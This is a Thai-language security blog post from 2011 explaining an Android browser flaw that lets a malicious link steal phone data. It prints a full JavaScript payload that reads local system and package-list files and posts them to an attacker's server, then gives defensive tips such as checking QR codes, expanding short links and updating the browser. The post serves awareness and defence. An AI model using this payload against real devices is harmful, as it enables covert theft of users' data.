Hacking&Security Workshop

ตอนนี้ MaYaSeVeN ได้ย้าย Blog ไปที่ http://blog.mayaseven.com


Wednesday, November 30, 2011

Stealing information from Android


Stealing information from Android

บทความนี้เราจะมาพูดถึงช่องโหว่หนึ่งของ Android ที่สามารถทำให้เราถูกขโมยข้อมูลบนโทรศัพท์ของเราได้ผ่านช่องโหว่และใช้ Javascript ในการดึงข้อมูลนั้นออกมาผ่าน Web Browser จากการเข้าเว็บของเรา มันหมายความว่าเพียงแค่เราเปิด Link ที่มีการฝั่ง Script พวกนี้ไว้ก็เสร็จทันทีโดย Link พวกนี้อาจจะอยู่ในรูป QRCode หรือ Short-Link หรืออะไรก็แล้วแต่ที่สามารถหลอกล่อให้เราเปิด Link อันตรายนั้นได้ ข้างล่างนี้เป็น Code ในส่วนที่ใช้ในการดึงข้อมูลจากเครื่องโทรศัพท์ Android ของเราส่งกลับไปยัง Hacker



<html>
<body>
<script lang=javascript>
var target_files = Array('/proc/version','/proc/self/status','/data/system/packages.list');
var results = new Array();
function addField(form, name, value) {
var hf = document.createElement('input');
hf.setAttribute('type', 'hidden');
hf.setAttribute('name', name);
hf.setAttribute('value', value);
form.appendChild(hf);
}
function uploadFiles(files) {
var form = document.createElement('form');
form.setAttribute('method', 'POST');
form.setAttribute('action', 'http://192.168.1.9:80/q');
var i = 0;
for (var fn in files) {
addField(form, 'f'+i, btoa(fn));
addField(form, 'd'+i, files[fn]);
i += 1;
}
document.body.appendChild(form);
form.submit();
}
for (var fn in target_files) {
fn = target_files[fn];
xh = new XMLHttpRequest();
xh.open('GET', fn, false);
xh.onreadystatechange = function() { if (xh.readyState == 4) { results[fn] = btoa(xh.responseText); } }
xh.send();
}
uploadFiles(results);
</script>
</body>
</html>

สำหรับวิธีป้องกันนั้นก็ง่ายมากเพียงแค่เราอย่าเปิด Link ที่ไม่มีความน่าเชื่อถือถ้าเป็น QRCode ก็ใช้โปรแกรมที่มันแสดง Link ก่อนเปิด Link ถ้าเป็น Short-Link ก็ไป ยืดให้เป็น Long-Link ก่อนที่ http://longurl.org/ สุดท้ายอาจจะมีวิธีพลิกแพลงพิสดารตามภาษา Hacker เราก็เพียงตระหนักว่าอะไรที่มันจะนำพาไปสู่ Link ที่ไม่น่าเชื่อถือก็อย่าทำ ในส่วนนี้ใช้ป้องกันได้กับ PC ด้วยเพราะช่องโหว่ Web Browser บน PC นี่แระตัวดีเลยที่ทำให้ User โดนโจมตีบ่อยครั้งทั้งรู้ตัวและไม่รู้ตัว วิธีป้องกันอีกวิธีคือ Update Android/Web Browser ให้เป็นรุ่นล่าสุด

สามารถแสดงความคิดเห็น สอบถาม แลกเปลี่ยนความรู้ได้ที่หน้า Facebook Page ครับ :)

Written by MaYaSeVeN